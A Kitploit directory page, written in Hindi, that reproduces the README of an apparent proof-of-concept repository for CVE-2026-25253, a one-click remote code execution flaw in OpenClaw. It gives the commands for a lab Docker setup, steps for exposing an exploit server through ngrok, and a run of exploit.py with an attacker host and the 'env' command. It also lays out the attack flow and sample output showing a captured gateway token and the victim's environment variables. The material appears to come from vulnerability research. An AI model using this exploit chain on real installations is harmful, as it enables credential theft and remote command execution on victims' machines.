Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-25253 — OpenClaw Authentication Token Exfiltration | Kitploit
उपकरण/GitHubGitHub/eqstlab/cve-2026-25253
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRed TeamingPayload Development
GitHubeqstlab/cve-2026-25253

CVE-2026-25253

OpenClaw Authentication Token Exfiltration

रिपॉजिटरी देखें
23 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-25253 OpenClaw 1-क्लिक RCE

★ CVE-2026-25253 OpenClaw 1-क्लिक रिमोट कोड एक्जीक्यूशन PoC ★

https://github.com/user-attachments/assets/e6957c61-7549-4e68-831e-a05436504a3e

विवरण

CVE-2026-25253 : OpenClaw प्रमाणीकरण टोकन एक्सफ़िल्ट्रेशन भेद्यता

विवरण: OpenClaw (उर्फ clawdbot या Moltbot) v2026.1.29 से पहले के संस्करण में हमलावरों को एक निर्मित gatewayUrl क्वेरी-स्ट्रिंग मान Control UI में प्रदान करके संग्रहीत गेटवे प्रमाणीकरण टोकन को बाहर निकालने की अनुमति देता है, जो बिना सत्यापन या उपयोगकर्ता पुष्टि के स्वचालित रूप से एक WebSocket कनेक्शन स्थापित करता है। इससे अनधिकृत गेटवे पहुंच और 1-क्लिक रिमोट कोड निष्पादन हो सकता है।

आवश्यकताएँ

  • Docker (विंडोज पर Docker Desktop)
  • Python 3.x (हमला करने वाला पक्ष)

फ़ाइलें

  • Dockerfile — OpenClaw असुरक्षित वातावरण बनाएं
  • templates/ — एक्सप्लॉइट द्वारा उपयोग किए जाने वाले दुर्भावनापूर्ण वेब पेज
  • config.txt — पीड़ित वातावरण में उपयोग किया जाने वाला OpenClaw कॉन्फ़िगरेशन
  • exploit.py — एक्सप्लॉइट सर्वर
  • requirements.txt — PoC निर्भरताएँ

पर्यावरण सेटअप

  1. Docker इमेज बनाएं
root@kitploit:~
docker build -t openclaw-vuln .
  1. पर्यावरण चलाएं (विंडोज)
root@kitploit:~
docker run -d --name openclaw-vuln -p 127.0.0.1:2222:22 openclaw-vuln
  1. SSH टनल बनाएं
root@kitploit:~
ssh-keygen -R [127.0.0.1]:2222
ssh -N -L 18789:127.0.0.1:18789 -p 2222 [email protected]
  • पासवर्ड: openclawlab
  1. OpenClaw Control UI तक पहुंचें ब्राउज़र में निम्न URL खोलें
root@kitploit:~
http://127.0.0.1:18789/
  1. Gateway Token d4b7c7689b82981ff86c735a9f8f616b310491b0d334659a1491c55a13353e66 दर्ज करें
  2. Connect पर क्लिक करें
  3. Config टैब खोलें
  4. config.txt की सामग्री चिपकाएं
  5. API key फ़ील्ड को अपनी OpenAI API key से बदलें
  6. कॉन्फ़िगरेशन सहेजें
  7. पुष्टि करें कि एजेंट सामान्य रूप से प्रतिक्रिया करता है

प्रूफ ऑफ कॉन्सेप्ट (PoC)

  1. निर्भरताएँ स्थापित करें (हमला करने वाला पक्ष)
root@kitploit:~
pip3 install -r requirements.txt
  1. एक्सप्लॉइट सर्वर को HTTPS पर प्रकट करें
root@kitploit:~
wget https://bin.equinox.io/c/bNyj1mQVY4c/ngrok-v3-stable-linux-amd64.tgz
tar xzf ngrok-v3-stable-linux-amd64.tgz
./ngrok authtoken YOUR_TOKEN
./ngrok http 13337
  • उत्पन्न फ़ॉरवर्डिंग होस्टनेम कॉपी करें
  1. एक्सप्लॉइट सर्वर चलाएं
root@kitploit:~
python3 exploit.py --host YOUR_NGROK_HOSTNAME --command "env"

उदाहरण:

root@kitploit:~
python3 exploit.py --host abcd-1234.ngrok-free.app --command "env"
  1. हमला ट्रिगर करें
  1. एक्सप्लॉइट सर्वर द्वारा प्रकट किया गया दुर्भावनापूर्ण पेज खोलें
  2. पेज के साथ पीड़ित के इंटरैक्शन का अनुकरण करें
  3. ब्राउज़र से एक्सप्लॉइट फ्लो ट्रिगर करें

हमला प्रवाह

  1. एक दुर्भावनापूर्ण URL पीड़ित के Control UI के gatewayUrl को बदलता है
  2. ब्राउज़र स्वचालित रूप से हमलावर-नियंत्रित WebSocket एंडपॉइंट से कनेक्ट होता है
  3. गेटवे प्रमाणीकरण टोकन हमलावर को लीक हो जाता है
  4. दुर्भावनापूर्ण पेज चुराए गए टोकन का उपयोग करके पीड़ित के स्थानीय OpenClaw गेटवे के लिए एक नया WebSocket कनेक्शन खोलता है
  5. एजेंट के माध्यम से एक कमांड निष्पादन अनुरोध भेजा जाता है
  6. निष्पादन परिणाम हमलावर सर्वर पर वापस आ जाता है

अपेक्षित परिणाम

  • पीड़ित का ब्राउज़र दुर्भावनापूर्ण WebSocket प्रवाह में पुनर्निर्देशित हो जाता है
  • गेटवे प्रमाणीकरण टोकन हमलावर द्वारा कैप्चर किया जाता है
  • हमलावर OpenClaw के माध्यम से एक कमांड निष्पादन अनुरोध भेज सकता है
  • कमांड आउटपुट हमलावर सर्वर पर वापस आ जाता है

नमूना आउटपुट

root@kitploit:~
[*] Exploit Server running on: abcd-1234.ngrok-free.app:13337
[*] Gateway token captured: d4b7c7689b82981ff86c735a9f8f616b310491b0d334659a1491c55a13353e66

==================================================
      [!] EXPLOIT RESULT CAPTURED [!]
==================================================
HOSTNAME=openclaw-vuln
PWD=/root
HOME=/root
...
==================================================

नोट्स

  • यह PoC OpenClaw 2026.1.24-1 को लक्षित करता है
  • एक्सप्लॉइट श्रृंखला Control UI में संवेदनशील gatewayUrl हैंडलिंग पर निर्भर करती है
  • दूरस्थ पीड़ित पहुंच के लिए, दुर्भावनापूर्ण पेज को HTTPS पर प्रस्तुत किया जाना चाहिए
  • स्थानीय OpenClaw गेटवे पीड़ित के ब्राउज़र के माध्यम से एक ब्रिज के रूप में पहुंचा जाता है

EQST अंतर्दृष्टि

हम महीने में एक बार CVE और मैलवेयर विश्लेषण प्रकाशित करते हैं। यदि आप रुचि रखते हैं, तो कृपया हमारे प्रकाशनों को देखने के लिए नीचे दिए गए लिंक का अनुसरण करें।

  • KR : https://www.skshieldus.com/security-insights/reports/eqst_openclaw_rce_vulnerability
  • EN : https://www.skshieldus.com/en/report?tab=eqst
टूल डाउनलोड करें